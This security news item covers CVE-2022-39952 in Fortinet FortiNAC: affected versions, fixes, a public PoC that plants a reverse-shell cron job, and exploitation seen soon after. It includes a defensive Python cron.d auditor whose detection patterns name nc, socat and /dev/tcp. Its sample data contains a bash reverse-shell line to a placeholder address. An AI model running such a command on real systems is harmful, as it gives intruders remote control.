
Researchers from Horizon3 earlier this week released a PoC exploit for a critical-severity vulnerability, tracked as CVE-2022-39952, in Fortinet’s FortiNAC network access control solution.
Fortinet released security updates last week to address two critical vulnerabilities in its FortiNAC and FortiWeb solutions. Tracked as CVE-2022-39952 and CVE-2021-42756, they are, respectively, an external control of file name or path issue in FortiNAC and a collection of stack-based buffer overflow issues in the proxy daemon of FortiWeb.
The affected products are:
- FortiNAC version 9.4.0
- FortiNAC version 9.2.0 through 9.2.5
- FortiNAC version 9.1.0 through 9.1.7
- FortiNAC 8.8 all versions
- FortiNAC 8.7 all versions
- FortiNAC 8.6 all versions
- FortiNAC 8.5 all versions
- FortiNAC 8.3 all versions
The CVE-2022-39952 vulnerability is fixed in FortiNAC 9.4.1 and later, 9.2.6 and later, 9.1.8 and later, and 7.2.0 and later.
The released PoC writes a cron job to /etc/cron.d/ that creates a reverse shell every minute. Shadowserver reported that attackers started targeting its honeypots to exploit the flaw. The threat actors started exploiting the Fortinet FortiNAC vulnerability CVE-2022-39952 the same day Horizon3 released the PoC exploit.
The attacks were initially observed from two IP addresses, located in Germany and the US, respectively.
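Because the PoC persists through a job in /etc/cron.d/ that runs every minute, auditing that directory is a quick post-exposure check. The following is an added example, not code from Horizon3, Shadowserver or Fortinet: it parses cron.d-style content and flags jobs whose command looks like a shell attached to a socket. The indicator patterns, the sample file contents and the addresses in them are assumptions constructed for illustration.

```python
import re

# Heuristic indicators of a shell bound to a socket (assumed list,
# not taken from the article; tune for your environment).
SHELL_PATTERNS = [
    re.compile(r"/dev/(tcp|udp)/"),
    re.compile(r"\b(ba|da|z)?sh\s+-i\b"),
    re.compile(r"\b(nc|ncat|netcat)\b.*\s-[a-z]*e\b"),
    re.compile(r"\bsocat\b.*\bexec:", re.I),
]
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
EVERY_MINUTE = {"* * * * *", "*/1 * * * *"}


def parse_cron_d(text):
    """Yield (schedule, user, command) for each job in /etc/cron.d syntax."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue  # skip blanks, comments and VAR=value settings
        fields = line.split(None, 2 if line.startswith("@") else 6)
        if line.startswith("@") and len(fields) == 3:
            yield fields[0], fields[1], fields[2]  # e.g. @reboot user cmd
        elif not line.startswith("@") and len(fields) == 7:
            yield " ".join(fields[:5]), fields[5], fields[6]


def audit(text):
    """Return (severity, user, command) for jobs matching a shell indicator."""
    findings = []
    for schedule, user, command in parse_cron_d(text):
        if any(p.search(command) for p in SHELL_PATTERNS):
            severity = "high" if schedule in EVERY_MINUTE else "review"
            findings.append((severity, user, command))
    return findings


# Constructed sample file contents (address is from the TEST-NET-3 range).
SAMPLE = """\
# constructed example
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root bash -i >& /dev/tcp/203.0.113.10/4444 0>&1
@reboot nac /usr/local/bin/start-agent
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(*finding)
```

To check a live system, pass the contents of each file under /etc/cron.d/ to `audit()` and compare any unfamiliar job against a known-good baseline, since pattern matching alone will miss obfuscated commands.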

Customers are urged to patch their devices as soon as possible to stay protected.